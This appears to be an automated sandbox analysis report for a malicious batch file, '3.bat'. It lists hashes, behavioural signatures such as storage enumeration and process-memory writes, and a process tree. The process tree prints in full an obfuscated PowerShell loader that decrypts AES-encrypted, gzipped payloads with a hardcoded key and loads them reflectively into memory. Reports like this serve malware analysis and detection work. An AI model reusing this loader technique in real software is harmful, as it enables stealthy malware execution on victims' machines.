Overview

overview

10

Static

static

1

1.js

windows7-x64

10

1.js

windows10-2004-x64

10

2.js

windows7-x64

8

2.js

windows10-2004-x64

8

3.bat

windows7-x64

7

3.bat

windows10-2004-x64

7

Analysis

  • max time kernel
    27s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    29-03-2023 11:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3.bat

  • Size

    145KB

  • MD5

    476d87590230e420d07a4d6fd677bd1d

  • SHA1

    29a2c881b58dd4d9ea40c2208952fdc39627265d

  • SHA256

    b6ee5ced40c6a82853e8b5543e139254b0aa9c503b670943818b332297293dd2

  • SHA512

    f2bad15633d8f8801eeb0843c9b7462480b8927014db4a0adc05f631a19039e6b15e63265d19eb624979b762fd1640435acffd65d34dd2b9ef219a0c7126edbc

  • SSDEEP

    3072:lKEN79wvVZHRTlfG+7nxmiNQuJ7Mhs6gf/Ks+vCN/MG1XLfzz6PM:ld9w7HRT/7nhiu7ks6gfSsrN/nXjzz6U

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -c #
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1940
    • C:\Users\Admin\AppData\Local\Temp\3.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\3.bat.exe" function fi($s){$s.Replace('PCgSe', '')}$TvSl=fi 'CPCgSehangPCgSeeExPCgSetenPCgSesiPCgSeoPCgSenPCgSe';$uPOI=fi 'CrPCgSeePCgSeaPCgSeteDPCgSeePCgSecrypPCgSetorPCgSe';$JkhJ=fi 'TraPCgSensPCgSefPCgSeormPCgSeFinaPCgSelBloPCgSecPCgSekPCgSe';$wwku=fi 'RePCgSeadLPCgSeinesPCgSe';$mfAv=fi 'GePCgSetPCgSeCPCgSeurrePCgSentPPCgSerocePCgSesPCgSesPCgSe';$LndS=fi 'FirPCgSestPCgSe';$IOON=fi 'LoaPCgSedPCgSe';$bGTU=fi 'EnPCgSetryPCgSePoPCgSeinPCgSetPCgSe';$VfMB=fi 'FroPCgSemBPCgSeasePCgSe6PCgSe4PCgSeStPCgSeriPCgSengPCgSe';$OqGp=fi 'InvPCgSeokPCgSeePCgSe';function zkztS($GNZBX){$cqmSn=[System.Security.Cryptography.Aes]::Create();$cqmSn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cqmSn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cqmSn.Key=[System.Convert]::$VfMB('UJReuXeqHSNd3qVXNxnQQ97OnOfSBItpzbPC/7v6/1s=');$cqmSn.IV=[System.Convert]::$VfMB('l+XIW/qwWmYbLeGbOZpElw==');$kDTzC=$cqmSn.$uPOI();$Eyxis=$kDTzC.$JkhJ($GNZBX,0,$GNZBX.Length);$kDTzC.Dispose();$cqmSn.Dispose();$Eyxis;}function JacSh($GNZBX){$BBOCs=New-Object System.IO.MemoryStream(,$GNZBX);$tgHik=New-Object System.IO.MemoryStream;$sqTvH=New-Object System.IO.Compression.GZipStream($BBOCs,[IO.Compression.CompressionMode]::Decompress);$sqTvH.CopyTo($tgHik);$sqTvH.Dispose();$BBOCs.Dispose();$tgHik.Dispose();$tgHik.ToArray();}function OVfya($GNZBX,$xwUmA){[System.Reflection.Assembly]::$IOON([byte[]]$GNZBX).$bGTU.$OqGp($null,$xwUmA);}$ImGss=[System.Linq.Enumerable]::$LndS([System.IO.File]::$wwku([System.IO.Path]::$TvSl([System.Diagnostics.Process]::$mfAv().MainModule.FileName, $null)));$MefbR = $ImGss.Substring(3).Split('\');$TlioL=JacSh (zkztS ([Convert]::$VfMB($MefbR[0])));$MTOPM=JacSh (zkztS ([Convert]::$VfMB($MefbR[1])));OVfya $MTOPM $null;OVfya $TlioL $null;
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:552

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\3.bat.exe
    Filesize

    442KB

    MD5

    92f44e405db16ac55d97e3bfe3b132fa

    SHA1

    04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

    SHA256

    6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

    SHA512

    f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

    Download Submit

  • memory/552-69-0x0000000002150000-0x0000000002190000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1940-58-0x000000001B3B0000-0x000000001B692000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1940-59-0x0000000002290000-0x0000000002298000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1940-60-0x00000000022D0000-0x0000000002350000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1940-61-0x00000000022D0000-0x0000000002350000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1940-62-0x00000000022D0000-0x0000000002350000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1940-63-0x00000000022DB000-0x0000000002312000-memory.dmp

    Filesize

    220KB

    Download